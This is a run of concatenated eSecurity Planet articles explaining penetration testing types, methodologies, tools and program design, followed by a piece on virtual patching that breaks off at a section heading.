Because these tests can use illegal hacker techniques, pentest services will sign a contract detailing their roles, goals, and responsibilities. To make sure the exercise is effective and doesn’t inadvertently cause harm, all parties to a pentest need to understand the type of testing to be done and the methods used. This will not only help better test the architectures that need to be prioritized, but it will provide all sides with a clear understanding of what is being tested and how it will be tested.

Here we’ll discuss penetration testing types, methods, and determining which tests to run. For an overview of our pentest coverage, start with What Is Penetration Testing? Complete Guide & Steps.

Also read: What Is a Pentest Framework? Top 7 Frameworks Explained

7 Types of Penetration Testing

Here we’ll cover seven types of penetration tests. As enterprise IT environments have expanded to include mobile and IoT devices and cloud and edge technology, new types of tests have emerged to address new risks, but the same general principles and techniques apply.

Additionally, tests can be internal or external and with or without authentication. Whatever approach and parameters you set, make sure that expectations are clear before you start.

While many penetration testing processes begin with reconnaissance, which involves gathering information on network vulnerabilities and entry points, it’s ideal to begin by mapping the network. This ensures the entirety of the network and its endpoints are marked for testing and evaluation.

1. Network tests

Some organizations differentiate internal from external network security tests. External tests use information that is publicly available and seek to exploit external assets an organization may hold. On the other hand, internal tests simulate attacks that come from within. These try to get in the mindset of a malicious inside worker or test how internal networks manage exploitations, lateral movement and elevation of privileges.

Internal and external network testing is the most common type of test used. If an attacker can breach a network, the risks are very high. Penetration testers will try to bypass firewalls, test routers, evade intrusion detection and prevention systems (IPS/IDS), scan for ports and proxy services, and look for all types of network vulnerabilities.

Also read: Penetration Testing vs. Vulnerability Testing: An Important Difference

2. Social engineering tests

Social engineering is a technique used by cyber criminals to trick users into giving away credentials or sensitive information. Attackers usually contact workers, targeting those with administrative or high-level access via email, calls, social media, and other approaches.

Most cyberattacks today start with social engineering, phishing, or smishing. Organizations that want to ensure that their human security is strong will encourage a security culture and train their workers. But a fundamental component of an effective human security culture is putting it to the test. While automated phishing tests can help security teams, penetration testers can go much further and use the same social engineering tools criminals use.

Penetration testers may run these simulations with prior knowledge of the organization — or not to make them more realistic. This also allows them to test an organization’s security team reaction and support during and after a social engineering attack.

3. Web application tests

Web-based applications are critical for the operation of almost every organizations. Ethical hackers will attempt to discover any vulnerability during web application testing and make the most of it. The goal of the test is to compromise the web application itself and report possible consequences of the breach.

Web application tests include web apps, browsers, ActiveX, plugins, Silverlight, scriptlets, and applets. Languages used in the test include Java, PHP, .NET, and others. Application programming interfaces (APIs) are also part of this test, along with XML, MySQL, Oracle, and other connections and systems. If web applications are mobile, they also need to be tested in their environments.

These tests are complex due to the endpoint and the interactive web applications when operational and online. Threats are constantly evolving online, and new applications often use open-source code. This presents several challenges. Code is not always double-checked for security, and evolving threats continuously find new ways to break into web applications. Penetration testers have to take into consideration all of these elements.

See the Top Web Application Firewalls

4. Wireless networks and websites

Companies rely on wireless networks to connect endpoints, IoT devices and more. And wireless networks have become popular targets for cyber criminals. Penetration testers will verify wireless encryption protocols, check for beacons, confirm traffic, search for access points and hotspots, and MAC address spoofing.

Wireless networks are often neglected by security teams and managers who set poor passwords and permissions. Penetration testers will try to brute force passwords and prey on misconfigurations. Penetration tests also make sure the system is safe from denial-of-service (DoS) attacks, where sites are flooded with traffic to force them to crash.

Finally, as companies embark on digital transformation and modernization, threats to IoT, sensors, cameras, mobile devices, and other endpoints intensify. Hackers will try to access critical assets through any of these new points, and the expansion of the digital surface works in their favor. Therefore, penetration tests that cover wireless security must be exhaustive.

5. Physical and edge computing tests

Not every threat to a company happens remotely. There are still many attacks that can be accelerated or only done by physically hacking a device. With the rise of edge computing, as businesses create data centers closer to their operations, physical testing has become more relevant.

White hat hackers will test door security systems, access cards, locks, cameras, and sensors as well as attempt to impersonate personnel. They will also verify how safe devices, data centers, and edge computer networks are when an attacker can physically access them. These tests can also be executed with the full knowledge of the security team or without it.

6. Cloud security tests

Private and public clouds offer many benefits for companies, but they also give cyber criminals opportunities. Many organizations have business-critical assets in the cloud that, if breached, can bring their operations to a complete halt. Companies may also store backups and other important data in these environments.

While cloud vendors offer robust built-in security features, cloud penetration testing has become a must. Penetration tests on the cloud require advanced notice to the cloud provider because some areas of the system may be off-limits for white hat hackers.

Cipher explains that penetration testing in the Microsoft Cloud must comply with the Microsoft Cloud Unified Penetration Testing Rules of Engagement, and while running a pentest on Amazon Web Services (AWS), organizations must fill out the AWS Vulnerability — Penetration Testing Request Form.

Cloud penetration tests will examine security, applications and APIs, access, storage, encryption, virtual machines (VMs), operating systems (OSs) and updates, Secure Shell (SSH) and Remote Desktop Protocol (RDP) remote administration, and misconfigurations and passwords.

See the Best Cloud, Container and Data Lake Vulnerability Scanning Tools

7. Red team vs. blue team

Penetration tests often engage in a military-inspired technique, where the red teams act as attackers and the blue teams respond as the security team. This holistic approach allows for penetration tests to be realistic and measure not just the weakness, exploitations, and threats, but also how security teams react.

While some organizations hire experts to act as blue teams, those who have in-house security teams can use this opportunity to upskill their workers. Security teams can learn how to respond more rapidly, understand what an actual attack looks like, and work to shut down the penetration tester before they simulate damage.

There are many variations of red and blue team tests. Blue teams can be given information about what the attacker will do or have to figure it out as it happens. Sometimes the blue team is informed of the time of the simulation or penetration test; other times, they are not. Penetration testers can give insights on how in-house security teams are responding and offer recommendations to strengthen their actions using this technique.

Also read:

• Red Team vs Blue Team vs Purple Team: Differences Explained
• How to Implement a Penetration Testing Program in 10 Steps
• Penetration Testing Phases & Steps Explained

Penetration Testing Methods and Approaches

There are three main testing methods or approaches. These are designed for companies to set priorities, set the scope of their tests — comprehensive or limited — and manage the time and costs. The three approaches are black, white, and gray box penetration tests.

Black box penetration tests

Black box penetration tests are the most complex to execute. In these tests, the organization does not share any information with the pen tester. The tester will have to identify and map the full network, its system, the OSes, and digital assets as well as the entire digital attack surface of the company.

Due to their complexity and time-consuming characteristics, black box tests are among the most expensive. They can take more than a month to complete. Companies choose this type of test to create the most authentic scenario of how real-world cyberattacks operate.

White box penetration tests

In a white box test, the organization will share its IT architecture and information with the penetration tester or vendor, from network maps to credentials. This type of test commonly establishes priority assets to verify their weaknesses and flaws.

White box tests are also known as crystal or oblique box pen testing. They bring down the costs of penetration tests and save time. Additionally, they are used when an organization has already tested other parts of its networks and is looking to verify specific assets.

Gray box penetration tests

Gray box testing, or translucent box testing, takes place when an organization shares specific information with white hat hackers trying to exploit the system. Gray box tests usually attempt to simulate what an attack would be like when a hacker has obtained information to access the network. Typically, the data shared is login credentials.

To avoid the time and costs of a black box test that includes phishing, gray box tests give the testers the credentials from the start. These tests also simulate internal attacks. The goal of this test is not to test authentication security but to understand what can happen when an attacker is already inside and has breached the perimeter.

How to Determine What Tests to Run

The type of test an organization needs depends on several factors, including what needs to be tested and whether previous tests have been done as well as budget and time. It is not recommended to begin shopping for penetration testing services without having a clear idea of what needs to be tested.

Each type of test is designed for a specific purpose. The first question any organization needs to ask is what assets are business-critical for their operations. Once the critical assets and data have been compiled into an inventory, organizations need to look into where these assets are and how they are connected. Are they internal? Are they online or in the cloud? How many devices and endpoints can access them?

Knowing what is critical for operations, where it is stored, and how it is interconnected will define the type of test. Sometimes companies have already conducted exhaustive tests but are releasing new web applications and services. In this case, they should consider running white box tests to only test the latest apps. Penetration testers can also help define the scope of the trials and provide insights into the mindset of a hacker.

Bottom Line: Types of Penetration Testing

Ultimately, the types of penetration tests you choose should reflect your most important assets and test their most important controls. Well chosen test parameters can give you the most important information you need — while leaving some budget for the inevitable cybersecurity improvements a good pentest report will recommend.

It’s essential that penetration tests not just identify weaknesses, security flaws, or misconfigurations. The best vendors will provide a list of what they discovered, what the consequences of the exploit could have been, and recommendations to strengthen security and close the gaps. Penetration tests play a vital role in cybersecurity and have proven critical for businesses to keep up to date with the ever-evolving global threat landscape.

Next: See the Best Penetration Testing Tools and the Top Open Source Penetration Testing Tools

The post 7 Types of Penetration Testing: Guide to Pentest Methods & Types appeared first on eSecurity Planet.

Pentesters work closely with the organization whose security posture they are hired to improve. There are different types of penetration tests, methodologies and best practices that need to be followed for optimal results, and we’ll cover those here.

Different Methods and Types of Penetration Testing

When a company hires a penetration testing service, it will typically be offered three different types of simulations. Known as black, white, and gray box pentests, these differ in how much information is provided to the pentester before running the simulated attacks. Additionally, tests can be comprehensive or limited. Limited tests can focus on narrower targets such as networks, Internet of Things (IoT) devices, physical security, cloud security, web applications, or other system components.

White box pentest

In white box penetration testing, organizations provide white hat hackers — sometimes called ethical hackers — with all of the information on their systems and simulation targets. The information provided includes source code and user credentials, privileged administrative access, and other critical data, which can be used to simulate an internal attack. Since much of the access information is provided up front, these tests are less expensive than black box tests.

Black box pentest

These are the most time-consuming and costly types of penetration tests. However, they are also the most realistic tests. They come very close to the steps that real attackers go through. In black box tests, also known as blind tests, penetration testers are not given any information. They have to start by mapping the entire infrastructure to find weak entry points and identify where critical business assets are located.

Gray box pentest

In gray box tests, also known as translucent tests, the organization gives some information to the pentesters but does not provide full disclosure of the architecture. The information provided to pentesters is usually an employer’s access credentials or knowledge of internal networks or applications.

Red and blue teams

In all these three types of pentests, security teams and penetration testers engage in what is known as a red-blue team strategy. Pentesters, posing as red teams, may previously inform the blue team, or security team, about the nature of the simulation, or they may not. Red-blue team strategy allows security teams to learn what actual attacks look like and measure their response and performance.

Red and blue team exercises can go beyond individual pentests to include comprehensive, ongoing testing objectives. Their communications can also be facilitated by a third team, called a purple team, for optimal effectiveness.

Also read: Red Team vs Blue Team vs Purple Team: Differences Explained

Comprehensive and limited pentests

Finally, tests can be comprehensive, where organizations test out their entire network, systems, and endpoints, or limited to specific infrastructure components. Extensive tests are rare, expensive, and hard to execute.

Because organizations usually have penetration testing programs that outline and schedule tests periodically, tests tend to be limited to one or a few components. Limited tests allow for a deeper dive into a particular environment, are used for updates and new applications, are more focused, and are cheaper and faster to run.

Depending on what limited tests focus on, they can be:

• Network pentests
• Wireless pentests
• Physical pentests
• Social engineering pentests
• Client-side pentests
• IoT pentests
• Mobile pentests
• Web pentests
• Cloud pentests
• Edge computing pentests

Also read: Penetration Testing vs. Vulnerability Testing: An Important Difference

Starting a Pentesting Program

Most organizations hire outside help to conduct pentesting, but those with larger security teams could start their own internal program, with the added benefit that they may be able to carry out a more comprehensive program as a result.

Either way, it’s best to design your pentesting program internally so that you ensure your goals are met and the most critical assets protected.

For more on pentesting program design and assembling a team, read How to Implement a Penetration Testing Program in 10 Steps.

7 Steps of Penetration Testing

Companies hiring penetration services should also familiarize themselves with the tests’ seven phases. White hat hackers must have intimate knowledge of all steps, including the first and final steps, which are often left out.

The phases of penetration tests are:

1. Pre-engagement
2. Reconnaissance or open-source intelligence (OSINT) gathering
3. Scanning or discovery
4. Vulnerability assessment: Gaining access
5. Exploitation: Maintaining access
6. Post-exploitation, reporting, and risk analysis
7. Remediation

Further reading: Penetration Testing Phases & Steps Explained

The Five Different Penetration Testing Methodologies

Leading security organizations have developed five penetration testing methodologies that serve as a blueprint for testing environments. These include:

• Open Web Application Security Project (OWASP)
• National Institute of Standards and Technology (NIST)
• Open-Source Security Testing Methodology Manual (OSSTMM)
• Information System Security Assessment Framework (ISSAF)
• Penetration Testing Execution Standard (PTES)

These methodologies provide clear direction on how pentests are conducted. Methodologies are exhaustive, detailed, and developed for different businesses and organizations. For example, some methods meet national security and federal standards, while others are focused on private companies.

Also read: What Is a Pentest Framework? Top 7 Frameworks Explained

NIST

Developed by NIST, an agency of the United States Department of Commerce, NIST Special Publication 800-115, Technical Guide to Information Security Testing and Assessment is the most specific from start to finish. Companies that want to meet high-security standards adopt this methodology for penetration testing. NIST is also mandatory for several businesses and organizations.

OSSTMM

Developed by the Institute for Security and Open Methodologies (ISECOM), the Open Source Security Testing Methodology Manual (OSSTMM) is the most popular pentest methodology. It is also specific, allowing white hat hackers to customize their tests to an organization’s particular demands. The widely used OSSTMM sets recognized standards for tests, is peer-reviewed, and is based on a scientific approach.

The OSSTMM guide is divided into several main sections and tests:

• Data controls
• Personnel security awareness
• Fraud and social engineering control
• Computer and telecommunications networks
• Wireless devices
• Mobile devices
• Physical security access controls
• Security processes
• Physical locations, including buildings, perimeters, and military bases

ISSAF

The Information Systems Security Assessment Framework (ISSAF), created by the Open Information Systems Security Group (OISSG), is the go-to methodology for pentesters that need to use a lot of tools and must run entirely personalized penetration tests. The downside of ISSAF is that it is no longer updated, and keeping up to date is critical in an ever-evolving cyber threat landscape. Despite this, testers still turn to ISSAF to link different steps of the pentest process with various tools. Like all methodologies, it covers all stages from pretest to reporting.

ISSAF phases include:

• Information gathering
• Network mapping
• Vulnerability identification
• Penetration
• Gaining access and privilege escalation
• Enumerating further
• Compromising remote users and sites
• Maintaining access
• Covering the tracks

OWASP

Developed by OWASP, this methodology is specifically designed for web and mobile applications, IoT devices, and application programming interfaces (APIs). It can not only help penetration testers but is also used in the early stages of app development. Additionally, the methodology is updated and helps the security community stay on top of the latest technologies.

The guide provides comprehensive guidelines for each penetration testing method, with over 66 controls to assess in total. Major areas include:

• Network footprinting (reconnaissance)
• Discovery and probing
• Enumeration
• Password cracking
• Vulnerability assessment
• AS/400 auditing
• Bluetooth-specific testing
• Cisco specific testing
• Citrix-specific testing
• Network backbone
• Server-specific tests
• VoIP (voice over Internet Protocol) security
• Wireless penetration
• Physical security
• Final report

PTES

The PTES framework offers guidance on all stages of a pentest. It consists of seven main sections. These cover everything testers need, including initial communications, intelligence gathering, threat modeling phases, vulnerability research, exploitation, and post-exploitation.

Additionally, because the seven sections and standards do not provide technical guidelines, PTES developed a comprehensive and detailed technical guide.

PCI DSS

And a bonus: The PCI Standards Council has also published pentesting guidance for organizations that come under the PCI DSS standard.

Also Read: Network Protection: How to Secure a Network

Pros and Cons of Penetration Testing

Like all security solutions and approaches, penetration tests have benefits, risks, and challenges. The most significant advantage of penetration testing is that it is the only tool that simulates human-made real attacks. Automated security technology cannot mimic hackers’ techniques in real life. Therefore, penetration testers are vital in providing technical insight into what attackers can do.

Penetration testing’s other benefits include detecting vulnerabilities, errors, and weaknesses. Penetration tests are also flexible and can be customized. This allows organizations to test different scenarios and adapt to modern threats as they are released into the wild. Tests can also reveal the consequences an error or misconfiguration might have.

Automated tools are good at detecting errors, but they typically don’t offer insight into what would happen if an attacker exploits a vulnerability. With pentests, the most expert testers will provide remediation recommendations. This allows organizations not to understand not only where their weak points are, but also how to fix them and take action.

On the other hand, penetration tests also have some drawbacks. Even if you use free tools, pentesting involves the expense of hiring security pros or consultants. And those pros need to clean up when they’re done, removing any backdoors or anything else they may have installed to get a foothold in the network. And of course reporting has to be good to fix the flaws they do find.

The efficiency of the test will depend on the penetration testers and the skills they bring to the table. Another challenge the sector faces is recognizing the importance of penetration tests and getting buy-in. While penetration testing started as a concept back in the 1970s, many organizations are still reluctant to run tests on their systems.

The lack of security culture and awareness of how pentesting has evolved and how effective it can be holds back many decision-makers. Trusting a penetration tester with your system, sensible data, and critical assets for business operations can also be a roadblock, especially because pentesters will simulate real attacks.

Top Pentesting Tools

There are numerous penetration test tools in the market; some are free to use, while others are commercial solutions. Some of the most popular and effective solutions pentesters use include Kali Linux, Burp Suite, Wireshark, and John the Ripper. And while not listed below, other popular penetration testing tools include Hashcat, Nmap, and Invicti.

Kali Linux

Kali Linux is an open-source operating system maintained by Offensive Security that facilitates penetration testing, security forensics, and other activities. Kali Linux is an all-in-one system that includes roughly 600 open source security tools, including the following:

• Nmap: Port scanner
• Wireshark: Packet analyzer
• Metasploit: Penetration testing framework with thousands of exploit modules
• John the Ripper: Password cracker
• Sqlmap: automated SQL injection and database import
• Aircrack-ng: For wireless local area network (LAN) penetration testing
• OWASP ZAP: Web application security scanner
• Burp Suite: Application security testing

Burp Suite

Burp Suite is a suite of application security testing tools developed by PortSwigger with free and paid license options. It also includes the popular Burp Proxy, which allows penetration testers to do man-in-the-middle (MitM) attacks between a web server and a browser. With this solution, pentesters can inspect network traffic to assess exploit vulnerabilities and data leaks in web applications.

With Burp Suite features, users can:

• Test clickjacking attacks
• Assess token strength
• Do deep manual tests
• Record results of automated attacks to adjust future attacks
• Execute fast brute-forcing and fuzzing with custom sequences of HTTP requests containing multiple payload sets
• Construct cross-site request forgery (CSRF) exploits, generate HTML exploits, and demonstrate CSRF attacks

Also read: Getting Started with the Burp Suite: A Pentesting Tutorial

Wireshark

This open-source license solution, available at GitHub, is specially designed for network monitoring. Using Wireshark, penetration testers can automatically read real-time data from different types of networks, such as Ethernet, token ring, loopback, and asynchronous transfer mode (ATM) connections.

Other features include:

• Data encryption
• Compliance management capabilities
• Server monitoring and alerting
• Data import and export

John the Ripper

John the Ripper is a free password-cracking tool that supports 15 operating systems, including 11 from the Unix family, DOS, Win32, BeOS, and OpenVMS.

The tools can be customized, with features including:

• Auto-detection of password hash types
• Support for encrypted password formats like Unix crypt hashes, Kerberos AFS tokens, and Windows LAN Manager hashes
• Ability to crack password encryption based on DES, MD5, Blowfish, and MD4
• Support for password hashes and passwords stored in databases and directory systems such as LDAP and MySQL

For more on the wide array of available pentesting tools, see the Best Penetration Testing Tools and the Top Open Source Penetration Testing Tools.

What to Do After a Penetration Test

Penetration tests do not end after white hat hackers detect vulnerabilities. Reporting and remediation are vital components that should never be left out. Top pentest vendors offer complete reports that provide a 360-degree view into the errors, the consequences, and recommendations to fix and patch security flaws.

Reporting also serves the security teams, IT, developers, workers, and top decision-makers. The entire work of the organization and its performance should be enhanced through reporting. The main goal of penetration tests is not to detect weakness but to improve efficiency and security and better prevent risks.

In addition, a good practice for penetration testers and organizations is to restore systems to the original state in which they were before an attack. If pentesters modify configurations and settings, install software, or make any other alterations to the system, they must clean and restore it.

Additionally, companies running penetration tests should be executing them within their pentest program and frameworks. After remediation, the pentest teams should monitor the security upgrades and patches and prepare to run the next scheduled test. Penetration testing is not a one-and-done process; it’s continual work.

For more on finding and fixing vulnerabilities, see:

• Top Vulnerability Management Tools
• Best Patch Management Software & Tools
• Vulnerability Management as a Service (VMaaS): Ultimate Guide

Bottom Line: Penetration Testing

Penetration testing is a critically important cybersecurity practice that can find security holes before hackers do. Along with threat hunting, it’s a practice that can’t be done by tools alone; it requires a human element. And those people need to be trained and prepared to do the job right. It’s not an easy undertaking, but it’s one that every organization should do to the best extent possible.

To see pentest tools in action, read Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR.

The post What Is Penetration Testing? Complete Guide & Steps appeared first on eSecurity Planet.

You can either create your own pentesting program or hire an outside firm to do it for you. Penetration test services have become common, with many security companies offering them. But they can be expensive and should be done often, so if you have the expertise on staff, consider developing your own penetration testing program. The result will be greater control over this important vulnerability and risk management process, and a more knowledgeable and prepared security staff.

Once you’ve decided to put together your own pentesting team, the first step is to create a plan that assesses your most critical assets so you can secure them.

See the Best Penetration Testing Tools and the Top Open Source Penetration Testing Tools

How Does a Penetration Testing Program Work?

Penetration testing differs from vulnerability scanning by using human pentesters to probe for vulnerabilities as hackers would.

During penetration tests, security experts, also known as ethical or white hat hackers or “red teams,” simulate real attacks on a system. The simulations are designed for testers to identify vulnerabilities, errors, or weaknesses in network infrastructure before an attacker can exploit them. Known as an offensive security approach, penetration testing keeps organizations one step ahead of cyber criminals.

A penetration testing program goes beyond individual penetration tests and outlines a blueprint for an organization to follow. The program answers what, when, why, and where tests should run. Penetration testing programs should be ongoing, detailed, scheduled and revised as needed.

The program should define a series of pentests to identify and remediate vulnerabilities in a system. Security leaders will know how many penetration tests to run as well as where and when to run them because the penetration program has been outlined. Even if an organization outsources all of its penetration tests, the program will provide a clear route when engaging with a vendor, a bug bounty program, or white hackers offering penetration testing as a service.

Also read: Penetration Testing vs. Vulnerability Testing: An Important Difference

10 Steps for Building a Penetration Testing Program

In penetration testing, preparation is key. Asking vendors to run random tests against a system will not provide the information needed to evaluate and remediate flaws and improve performance and security.

It is essential to know the inside and out of penetration tests and what you expect to achieve. Designing a penetration test program can be overwhelming. Here are 10 simple steps that can guide you through the process.

1. Secure budget and human resources

While penetration tests are cost-effective and have important benefits, organizations must first secure the budget and ensure they have the human resources to run them. Because tests should be ongoing for a long time, this should be the first step an organization takes. Organizations must make sure they have all the resources they need to get them through the program.

2. Assemble a penetration test program team

The first thing an organization should do, even before starting to build the program, is finding the right team and talent. Define roles and responsibilities and ensure the team members have all the necessary skills and certifications. The team will also need to work with other departments and management to build the program.

As you assemble your team and think about your objectives, think about the tools you’ll need for your pentest targets, and find or train staff to run those tests. Think about the possible attack paths and important assets to protect, like Active Directory or a critical application database or code repository, and then decide on the tests you need to run to test their security.

Also read:

• Red Team vs Blue Team vs Purple Team: Differences Explained
• Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

3. Map the digital surface, and build an asset inventory

The penetration testing team should comprehensively map the entire digital infrastructure, networks, Internet of Things (IoT) devices, edge, and cloud resources. Additionally, the map should include a data and asset inventory with all relevant information about the data cycle, from input, generation, and gathering to distribution, sales, and disposal of data.

A clear vision of the entire system helps to quickly identify where each component is located and provides a birds-eye view of what needs protecting. Make a note of future projects and include them in the map and inventory.

4. Define business objectives

Like any other program in operations, pentesting should be aligned with the business’s mission, goals, and targets. Focus on assets critical for operations, such as a customer database or critical application. Business objectives may change over time and require revision. Therefore, the team must come back to this point as penetration tests are executed over time.

5. Set asset priorities

Business objectives may be to increase sales, adjust to the economic slowdown, pivot disruptions, or prevent customer churn. Whatever the company’s objectives are, the security of the assets that drive their outcomes must be guaranteed and tested.

Identify asset priority using the data inventory and digital surface map. If there are future projects in development that are critical, make sure to include them.

Pentests can be done by brute force, or a black box approach, simulating an attack where hackers know nothing of your systems, or a white box approach, where they have knowledge of your system architecture. A blend of the two is called a gray box approach.

A brute force attack simulation would involve probing your network, web applications and users for weaknesses, while a white box approach might use sophisticated code analysis to probe an application for weaknesses.

6. Set level priorities

Your company will be running several periodical tests lasting several days or longer. Now that there is a clear idea of what needs to be secured, set priorities for tests that need to happen first and those that follow down the line.

Additionally, running tests can be expensive, so consider spreading out tests for different systems depending on the priorities. Priorities usually include tests that check:

• Vulnerability exploitation
• Code execution
• Lateral movement
• Data exfiltration
• Application vulnerabilities
• Input validation
• Authentication
• Authorization enforcement
• Vendor trust and supply chain security

7. Define the type and number of tests, and schedule them

As a company expands into the digital world, its data, systems, networks, and digital assets will evolve. Penetration tests can only provide a view of a company’s IT infrastructure at a specific moment.

However, when designing a penetration testing program, companies can schedule yearly, quarterly, or monthly penetration tests to protect their systems over time as they change. Additionally, it’s important to know how penetration tests work, including their phases and types, to understand which ones to run, while always focusing on identified asset priorities.

Also read: Penetration Testing Phases & Steps Explained

8. Establish communication channels and awareness

It’s critical to establish clear communication channels. Penetration testing should not be siloed and limited to IT and security teams. Executives, data engineers, developers, content creators, marketing and sales, production, and distribution teams should all be aware of the program.

Penetration tests are all about learning about errors, misconfigurations, and weaknesses. Therefore, every worker may have a role to play in improving security. Feedback is always encouraged to create a strong security culture.

9. Choose penetration testers, and run the tests

Penetration tests can be run in-house, through a vendor, through bug bounty programs, or through organizations that offer penetration tests as a service.

Each method has its pros and cons. While in-house tests allow for complete control, a team of experts is needed to execute them. On the other hand, outsourcing penetration tests can be expensive, depending on the vendor or program, but organizations can also increase the diversity of talent and resources with this option. In the end, it comes down to an organization’s resources, the importance of its data, and the level of confidence in security controls.

10. Reporting, remediation, monitoring, and restarting

A penetration testing program does not end when tests conclude. Each test should reveal vulnerabilities and recommend patches and remediations. Fixing vulnerabilities is the most direct goal of penetration testing.

Reporting, remediation, monitoring, and retesting take time and are essential; otherwise, you are just identifying weaknesses but not fixing them or checking to see if patches and mitigations were applied. This stage is critical to improving an organization’s learning and performance curves at all levels.

It’s also essential to revise and adjust the program after every test and after the entire scheduled series of tests are completed. Simply put, step 10 is not the end; it is followed by a restart and step one.

See the Best Patch Management Software & Tools

Teams to Involve in the Pentesting Program

No penetration testing program will be successful if it only includes security teams and IT departments. An organization’s digital attack surface extends to every aspect of its operations.

Boards and leaders need to know about security to make informed business decisions, developers need to learn from errors, and even the human element of security will be involved in simulated phishing attacks during penetration tests. Therefore, everyone should have some role in the program, depending on their contribution.

It’s also important to understand that some penetration tests may simulate attacks but never disclose to the company what they will be attacking or when. These blind attacks try to get as close as they can to real-world scenarios to test security teams’ response performance and time — something closer to red-and-blue teaming.

Hackers will also run attacks attempting to steal credentials from workers as cyber criminals do. If workers are informed about these simulations, the results of the tests will not be realistic.

Engineers and product teams need to be mainly involved in the program’s reporting, remediation, and monitoring phases. Just like security teams, they will learn from simulations and improve their work.

Executives can better understand the risks, consequences, and state of their security with penetration tests. This helps create a top-to-bottom security culture and common understanding that facilitates daily cybersecurity operations.

Bottom Line: Starting a Pentesting Program

Even if you choose to outsource your pentesting program, you should still take the time to develop a pentesting program. It will make your security team and business managers better informed, and will also guide discussions with vendors and service providers. 

A penetration testing program goes beyond identifying weaknesses before criminals can detect them and use them against you. It provides a vision of the organization’s performance, security, awareness, and culture and can help you achieve business targets and goals. You need to know what’s critical before you can figure out how to protect it.

Read next: What is Cyber Threat Hunting? Definition, Techniques & Steps

The post How to Implement a Penetration Testing Program in 10 Steps appeared first on eSecurity Planet.

Zero-day threats and legacy systems are two ways that vulnerabilities can be created for which no patch may exist for some time, if ever. In those cases, security teams can block a potential attack path until a permanent fix can be found.

Cyber criminals rush to exploit vulnerabilities, bugs, errors, misconfigurations, and unchecked code before patches become available and security teams are able to test and deploy them, so security teams must respond with equal speed to close off potential attack paths to those vulnerabilities until they can be patched. Those defensive steps are referred to as virtual patching. We’ll focus here on how security teams deploy those defenses.

How Virtual Patching Works

Also known as external patching or just-in-time patching, the term virtual patching was coined by intrusion prevention system (IPS) vendors several years ago. Virtual patching bypasses the complex and time-consuming process of developing and deploying patches by using rules, mitigations and protective steps, often at the IPS or firewall level, to shore up networks to prevent attackers or malware from accessing these vulnerabilities.

Virtual patches are similar to vendor patches in the sense that they protect against specific exploits. The main difference is that a virtual patch is deployed at the network level, typically using an IPS or firewall rule, instead of the device or asset that contains the vulnerability.

IPS solutions are built to monitor and inspect traffic while blocking malicious activities. Using virtual patches, IPS can identify and stop attempts targeting a specific vulnerability. This creates a layer of protection around the vulnerable asset instead of patching the asset itself. IPS signatures or virtual patches can be deployed at the network level using the intrusion prevention (IPS) functionality built into a next-generation firewall (NGFW), a web application firewall (WAF) or a traditional standalone IPS appliance.

Virtual patches must work to prioritize business-critical network traffic, be effective in their ability to shield a vulnerable asset, and be coded for rapid and correct deployment on different environments: mobile, cloud, hybrid, or web. Virtual patching must also be able to run deep packet inspection to shut down malicious packets and attempted attacks hiding in web and network traffic.

Also read: Is the Answer to Vulnerabilities Patch Management as a Service?

Virtual Patching Best Practices and Phases

Virtual patching requires several phases to be done correctly: preparation, identification, analysis, virtual patch creation, implementation and testing, and recovery and follow-up.

Preparation

Virtual patching should be part of a continuous offensive security approach. This means it should not react to vulnerability exploits but prevent them before they happen. The security groundwork is done in the preparation stage.

A critical step is ensuring you get all updates, patches, and vulnerability alerts set up. Additionally, to avoid authorization delays, virtual patches can be pre-authorized. Virtual patches do not affect the asset’s code itself, so exhaustive tests on the affected app are not needed. It can also help protect an asset as the real patch is being developed and tested.

“Categorizing virtual patches in the same group as Anti-Virus updates or Network IDS signatures helps to speed up the authorization process and minimize extended testing phases,” recommends the Open Web Application Security Project (OWASP).

Virtual patching tools must be deployed and operational. For tools like ModSecurity WAF for Apache servers (which works on non-Apache services as well) or OWASP’s ESAPI WAF, it’s best to have them installed and enabled. That way, when you need them they’re ready to go.

Identification

There are two methods for identifying vulnerabilities: proactive and reactive. Proactive identification approaches are recommended. In this method, organizations conduct penetration tests and vulnerability scanning and use other tools to identify weaknesses before attackers can exploit them. Reactive identification comes in late when the vulnerability is already disclosed by vendors, commercial application software developers, or a security incident.

Analysis

Once a vulnerability has been identified, it needs to be analyzed before the patch is deployed. Organizations need to ask themselves what the exposure is, where it is found, what systems it affects, and how it can be exploited. Analyzing whether the flaw affects business-critical assets is also crucial.

Secondly, security teams must determine if the virtual patching tool can detect the flaw. Using the vulnerability information, the bug tracking system can also monitor and inform on the incident. The vulnerability identifier (CVE name/number) must also be double-checked.

Additionally, an inventory of the software and systems impacted must be done, and configurations that trigger the problem must be listed. Vulnerability announcements also usually reveal the exploit code; this data can be used to develop and test virtual patches.

Virtual patch creation

The identification phase will help you determine the priority, risk, and time-to-fix parameters. Sometimes complete fixes cannot be applied due to high risks in real-time settings. Partial fixes can buy you enough time to develop more comprehensive patches. A virtual patch is about risk reduction, so be prepared to compromise if necessary.

There are two rules for virtual patch development: positive (allow) and negative (block) approaches. A virtual patch should never block legitimate traffic or miss an attack, even when malware is coded to evade detection.

In positive manual virtual patches, models are coded with valid inputs such as character set, length and others, while the rest is denied access. In contrast, in negative security blocks, list patch rules detect specific attacks and only block those. Negative patches are easier and faster to code but can be more easily evaded. Positive patches, on the other hand, may not be feasibly deployed in time in large environments since they are manually coded.

Companies can also benefit from automated virtual patch creation tools that use the XML report created by automated vulnerability detection tools. These automated patches are created by auto-converting vulnerability data into virtual patches. Examples of automated virtual patch creation tools are OWASP ModSecurity Core Rule Set (CRS) Scripts, ThreadFix Virtual Patching, and Direct Importing to WAF Devices provided by many vendors.

Implementation and testing

There are different tools to implement virtual patches. These include web browsers, command-line web clients such as Curl and Wget, local proxy servers, and ModSecurity AuditViewer.

Regarding testing, if you used a vulnerability scanning tool or detected a flaw with a penetration test, you should rerun the scans and tests to check that the virtual patch is working. To ensure you are not blocking any normal traffic, you should initially set a log-only configuration when implementing virtual patches.

Recovery and follow up

Virtual patching does not end with implementation and testing. Cyber criminals update attacks with evolving malware exploit versions. The virtual patch must be followed up and monitored. Organizations should also document the entire process in case they need to restart the cycle.

Virtual patch performance must also be controlled, making sure traffic is not being affected improperly. Additionally, virtual patches are often temporary fixes, so they must be checked to see if the original asset patch has been released and installed.

What Can Happen to Unpatched Vulnerabilities?

